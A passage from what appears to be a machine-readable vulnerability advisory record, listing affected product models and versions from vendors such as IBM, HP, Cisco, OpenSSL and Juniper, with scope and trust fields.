"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.21" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.4" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.3" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.00" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.40" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.b1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087380" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.e0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.21" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "project openssl 1.0.1k", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50001.1" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.2" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems 350.e1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ctpview", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6.156" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.00" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.8" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "system management homepage c", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.4(7.26)" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8.0.10" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "power systems 350.a0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "systems insight manager sp5", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.3" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(5.106)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.3" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.1.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.8" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22079060" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "mq client for hp integrity nonstop server supportpac mqc8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-0" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88042590" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "netscaler application delivery controller", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.68" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.00" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.02" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.4" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.22" }, { "model": "application policy infrastructure controller 1.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "820.03" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8852" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205577" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "websphere mq for openvms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "security proventia network enterprise scanner", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.9.1" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0-103" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.12.201" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.16" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.1.3.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.81" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-95" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.00" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "ace30 application control engine module 3.0 a5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "junos os 12.3r10", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.96" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.6" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.7" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2.127" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.50" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.2" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cms r17 r4", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087220" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.60" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.00" }, { "model": "powerlinux 7r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "infosphere master data management patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "power systems 350.b0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.5.03.00" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "wag310g residential gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "power ese", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "cognos controller if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.3" }, { "model": "as infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "820.02" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.00" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.11" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.7" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "linux enterprise server for vmware sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1(0.625)" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "agent desktop", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88079030" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-22x)0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087370" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "52056340" }, { "model": "ctpos 7.0r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "system management homepage a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11.197" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "power system s824l", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "system m4 hd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054600" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.80" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.30" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.0" }, { "model": "infosphere master data management provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "560" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "power 795", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", 